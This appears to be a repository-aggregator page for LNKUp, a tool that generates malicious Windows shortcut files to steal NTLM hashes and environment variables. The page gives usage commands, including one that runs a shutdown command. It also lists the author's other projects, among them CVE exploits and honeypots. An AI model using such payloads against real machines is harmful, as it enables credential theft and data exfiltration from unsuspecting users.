• Stars
    star
    249
  • Rank 162,987 (Top 4 %)
  • Language
    Python
  • Created over 7 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Generates malicious LNK file payloads for data exfiltration

LNKUp

LNK Data exfiltration payload generator

This tool will allow you to generate LNK payloads. Upon rendering or being run, they will exfiltrate data.

Info

I am not responsible for any actions you take with this tool!
You can contact me with any questions by opening an issue, or via my Twitter, @Plazmaz.

Known gotchas

  • This tool will not work on OSX or Linux machines. It is specifically designed to target windows.
  • There may be issues with icon caching in some situations. If your payload doesn't execute after the first time, try regenerating it.
  • You will need to run a responder or metasploit module server to capture NTLM hashes.
  • To capture environment variables, you'll need to run a webserver like apache, nginx, or even just this

Installation

Install requirements using
pip install -r requirements.txt

Usage

Payload types:

  • NTLM
  • Environment
    • Steals the user's environment variables.
    • Examples: %PATH%, %USERNAME%, etc
    • Requires variables to be set using --vars
    • Example usage:
      lnkup.py --host localhost --type environment --vars PATH USERNAME JAVA_HOME --output out.lnk

Extra:

  • Use --execute to specify a command to run when the shortcut is double clicked
    • Example:
      lnkup.py --host localhost --type ntlm --output out.lnk --execute "shutdown /s"

More Repositories

1

leaky-repo

Benchmarking repo for secrets scanning
Python
197
star
2

MongoDB-HoneyProxy

A honeypot proxy for mongodb. When run, this will proxy and log all traffic to a dummy mongodb server.
JavaScript
83
star
3

Duckuino

A basic Duckyscript to Arduino converter
JavaScript
59
star
4

CVE-2019-18634

A functional exploit for CVE-2019-18634, a BSS overflow in sudo's pwfeedback feature that allows for for privesc
Shell
57
star
5

JSBN

An experimental implementation of a bot client which interprets commands through Twitter, thus requiring no hosting of servers from the command issuer
JavaScript
43
star
6

LiquidHoney

A small, fluid, low-interaction honeypot
Python
19
star
7

Agent7

An open source penetration testing tool
Java
14
star
8

CapeGiver

ProtocolLib is required! A proof of concept for an exploit in recent all Minecraft versions that allows servers to give users capes.
Java
13
star
9

GHScraper

A tool for gathering potentially sensitive data from github's public stream
JavaScript
11
star
10

every-chrome-extension

Collect ALL the crx files
Shell
10
star
11

CVEStack

Scan products in your stack for known vulnerabilities
Python
10
star
12

ShortStats

An OSINT/data gathering tool for extracting details from shortened bitlinks
Python
9
star
13

Twitter-Bots-List

A list of accounts that auto-retweet or like certain keywords
8
star
14

awful-gitposts

💩 Bad memes and shitposts
7
star
15

bluekeep-pcap

Capture of Metaploit BlueKeep <--> OpenCanary
5
star
16

CVE-2020-1350-poc

A basic proof of concept for CVE-2020-1350
Python
5
star
17

wsl-dotfiles

My dotfiles for Bash on Windows/Windows Subsytem for Linux
Shell
5
star
18

JHoneypot

A simple java SSH Honeypot
Java
5
star
19

HoneyMesh

A centralized honeypot logging system for nodejs
JavaScript
4
star
20

FileJuice

C#
4
star
21

basic-python-skeleton

Because I've typed this way too many times
Python
3
star
22

dotfiles

My dotfiles. Very minimalist at the moment.
Shell
2
star
23

DiscordUI

Provides reaction-based UI components for using with Discord
Python
2
star
24

unlock-hero

Ludum Dare 45
JavaScript
2
star
25

threat-actor-names

Providing valuable information on the latest threat actors before they even exist
JavaScript
2
star
26

go-home

Research into Go's default random.Source PRNG
Go
1
star
27

GitRacoon

JavaScript
1
star
28

terminal-profiles

My personal profiles for Windows Terminal
PowerShell
1
star
29

PRFuzzer

Really stupid simple BitBucket PR fuzzing. Probably won't work for anyone else, not actively maintained.
Python
1
star
30

Neuroticz

A basic webpage summarizing framework
Java
1
star